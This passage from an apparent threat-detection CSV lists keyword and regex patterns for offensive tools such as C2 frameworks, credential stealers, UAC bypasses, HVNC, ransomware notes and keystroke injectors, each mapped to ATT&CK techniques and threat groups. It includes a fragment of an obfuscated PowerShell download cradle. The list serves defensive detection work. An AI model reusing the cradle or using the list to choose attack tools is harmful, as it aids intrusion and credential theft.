Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","47093"
"*Hello from DllMain-PROCESS_ATTACH in Merlin!*",".{0,1000}Hello\sfrom\sDllMain\-PROCESS_ATTACH\sin\sMerlin!.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","47094"
"*Hello from KaynLdr*",".{0,1000}Hello\sfrom\sKaynLdr.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","47095"
"*Hello from Malicious DLL*",".{0,1000}Hello\sfrom\sMalicious\sDLL.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","N/A","10","","N/A","","","","47096"
"*Hello From sadsad Team*",".{0,1000}Hello\sFrom\ssadsad\sTeam.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","47097"
"*Hello, you have been pwned!*",".{0,1000}Hello,\syou\shave\sbeen\spwned!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","N/A","7","3","221","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z","47098"
"*hello@pico.sh*",".{0,1000}hello\@pico\.sh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","47099"
"*hello_from_powerautomatec2*",".{0,1000}hello_from_powerautomatec2.{0,1000}","offensive_tool_keyword","pac2","PAC2 is a framework that generates arbitrary flows and sends and executes them on the Power Automate Platform - using Power automate as a C2","T1550.001 - T1204.002 - T1102 - T1071.001","TA0005 - TA0008 - TA0010- TA0011","N/A","N/A","C2","https://github.com/NTT-Security-Japan/pac2","1","0","#content","N/A","6","10","6","1","2024-04-16T11:58:54Z","2024-03-01T08:06:32Z","47100"
"*HelloReflectionWorld.exe*",".{0,1000}HelloReflectionWorld\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","47101"
"*hellsgate.asm*",".{0,1000}hellsgate\.asm.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","N/A","10","1028","121","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z","47102"
"*HellsGate.exe*",".{0,1000}HellsGate\.exe.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","N/A","10","1028","121","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z","47103"
"*HellsGate.sln*",".{0,1000}HellsGate\.sln.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","N/A","10","1028","121","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z","47104"
"*HellsGate.vcxproj*",".{0,1000}HellsGate\.vcxproj.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","N/A","10","1028","121","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z","47105"
"*Hell'sHall.vcxproj*",".{0,1000}Hell\'sHall\.vcxproj.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","47106"
"*Hell'sHall-Clang&NoCrt.zip*",".{0,1000}Hell\'sHall\-Clang\&NoCrt\.zip.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","47107"
"*help.blacksnaketeam@evilmail.to*",".{0,1000}help\.blacksnaketeam\@evilmail\.to.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","47108"
"*help\dll.txt*",".{0,1000}help\\dll\.txt.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","47109"
"*helpermail@onionmail.org*",".{0,1000}helpermail\@onionmail\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","47110"
"*helpers.gpoddity_smbserver*",".{0,1000}helpers\.gpoddity_smbserver.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","47111"
"*helpmanager@airmail.cc*",".{0,1000}helpmanager\@airmail\.cc.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","47112"
"*helpteam@mail.ch*",".{0,1000}helpteam\@mail\.ch.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","47113"
"*helviojunior/hookchain*",".{0,1000}helviojunior\/hookchain.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","1","N/A","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","47114"
"*helviojunior/knowsmore*",".{0,1000}helviojunior\/knowsmore.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","1","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","47115"
"*Henkru/cs-token-vault*",".{0,1000}Henkru\/cs\-token\-vault.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","N/A","10","10","142","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z","47116"
"*henriksb/ExtensionSpoofer*",".{0,1000}henriksb\/ExtensionSpoofer.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","N/A","9","2","179","65","2024-12-12T18:05:28Z","2017-11-11T16:02:17Z","47117"
"*HENRY.PROWSE@TUTANOTA.COM*",".{0,1000}HENRY\.PROWSE\@TUTANOTA\.COM.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","47118"
"*henry-richard7/Browser-password-stealer*",".{0,1000}henry\-richard7\/Browser\-password\-stealer.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","47119"
"*Here are some passwords for you, have fun:*",".{0,1000}Here\sare\ssome\spasswords\sfor\syou,\shave\sfun\:.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","0","#content","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","47120"
"*Here are the oneliners for reverse shell using rpc named pipes*",".{0,1000}Here\sare\sthe\soneliners\sfor\sreverse\sshell\susing\srpc\snamed\spipes.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","47121"
"*hereiam.tuns.sh*",".{0,1000}hereiam\.tuns\.sh.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","47122"
"*hernan@ampliasecurity.com*",".{0,1000}hernan\@ampliasecurity\.com.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#email","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","47123"
"*HernanRodriguez1/SharpBruteForceSSH*","HernanRodriguez1\/SharpBruteForceSSH","offensive_tool_keyword","SharpBruteForceSSH","simple SSH brute force tool ","T1110.003 - T1078","TA0006 ","N/A","N/A","Credential Access","https://github.com/HernanRodriguez1/SharpBruteForceSSH","1","1","N/A","N/A","9","1","60","10","2024-04-28T17:56:33Z","2024-04-25T20:06:05Z","47124"
"*Heroinn FTP*",".{0,1000}Heroinn\sFTP.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","47125"
"*heroinn_client*",".{0,1000}heroinn_client.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","47126"
"*heroinn_core*",".{0,1000}heroinn_core.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","47127"
"*heroinn_ftp*",".{0,1000}heroinn_ftp.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","47128"
"*heroinn_shell*",".{0,1000}heroinn_shell.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","47129"
"*heroinn_util*",".{0,1000}heroinn_util.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","47130"
"*HeroinnApp*",".{0,1000}HeroinnApp.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","47131"
"*HeroinnProtocol*",".{0,1000}HeroinnProtocol.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","47132"
"*HeroinnServerCommand*",".{0,1000}HeroinnServerCommand.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","47133"
"*herrcore/LocalShellExtParse*",".{0,1000}herrcore\/LocalShellExtParse.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","1","N/A","N/A","9","1","20","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z","47134"
"*Hey Dear! You Have Won Free Rs 399 Jio Recharge*",".{0,1000}Hey\sDear!\sYou\sHave\sWon\sFree\sRs\s399\sJio\sRecharge.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","47142"
"*hfiref0x.github.io/Beacon/uac/exec*",".{0,1000}hfiref0x\.github\.io\/Beacon\/uac\/exec.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","1","N/A","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","47143"
"*hfiref0x/UACME*",".{0,1000}hfiref0x\/UACME.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","47144"
"*hfiref0x/WDExtract*",".{0,1000}hfiref0x\/WDExtract.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","47145"
"*Hibr2Dmp.exe*",".{0,1000}Hibr2Dmp\.exe.{0,1000}","offensive_tool_keyword","Hibr2Dmp","Convert hiberfil.sys to a dump file with hibr2dmp (can be used with windbg to exploit lsass dump)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/System/dump_lsass_by_converting_hiberfil_to_dmp.ps1","1","1","N/A","N/A","N/A","2","184","19","2024-12-20T10:22:25Z","2022-12-05T12:40:02Z","47147"
"*HID\VID_03EB&PID_2401&REV_0100*",".{0,1000}HID\\VID_03EB&PID_2401&REV_0100.{0,1000}","offensive_tool_keyword","Hak5 Rubber Ducky","keystroke injection tool","T1056 - T1204","TA0001 - TA0009","N/A","N/A","Hardware","https://github.com/mthcht/awesome-lists/blob/main/Lists/suspicious_usb_ids_list.csv","1","0","#deviceid","can appear in windows eventid 6416","10","10","936","111","2025-04-22T21:16:31Z","2022-12-11T10:45:11Z","47148"
"*HID\VID_03EB&PID_2422&REV_0100*",".{0,1000}HID\\VID_03EB&PID_2422&REV_0100.{0,1000}","offensive_tool_keyword","Hak5 Rubber Ducky","keystroke injection tool","T1056 - T1204","TA0001 - TA0009","N/A","N/A","Hardware","https://github.com/mthcht/awesome-lists/blob/main/Lists/suspicious_usb_ids_list.csv","1","0","#deviceid","can appear in windows eventid 6416","10","10","936","111","2025-04-22T21:16:31Z","2022-12-11T10:45:11Z","47149"
"*HID\VID_1B4F&PID_9207*",".{0,1000}HID\\VID_1B4F&PID_9207.{0,1000}","offensive_tool_keyword","Cactus WHID","advanced keystroke injection device","T1056 - T1204","TA0001 - TA0009","N/A","N/A","Hardware","https://github.com/mthcht/awesome-lists/blob/main/Lists/suspicious_usb_ids_list.csv","1","0","#deviceid","can appear in windows eventid 6416","10","10","936","111","2025-04-22T21:16:31Z","2022-12-11T10:45:11Z","47150"
"*hidd -EXecUTiOnPO BYpASS -cO  ""i`EX (    neW-o`BJE`cT N`ET.`weBcl`IeNT    )*",".{0,1000}hidd\s\-EXecUTiOnPO\sBYpASS\s\-cO\s\s\""i\`EX\s\(\s\s\s\sneW\-o\`BJE\`cT\sN\`ET\.\`weBcl\`IeNT\s\s\s\s\).{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","47151"
"*Hidden.Desktop.mp4*",".{0,1000}Hidden\.Desktop\.mp4.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","47152"
"*hidden_tear_decrypter.Properties.Resources*",".{0,1000}hidden_tear_decrypter\.Properties\.Resources.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","47153"
"*HiddenDesktop * *",".{0,1000}HiddenDesktop\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","47154"
"*HiddenDesktop.*",".{0,1000}HiddenDesktop\..{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","47155"
"*HiddenDesktop.cpp*",".{0,1000}HiddenDesktop\.cpp.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","47156"
"*HiddenDesktop.exe*",".{0,1000}HiddenDesktop\.exe.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","1","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","47157"
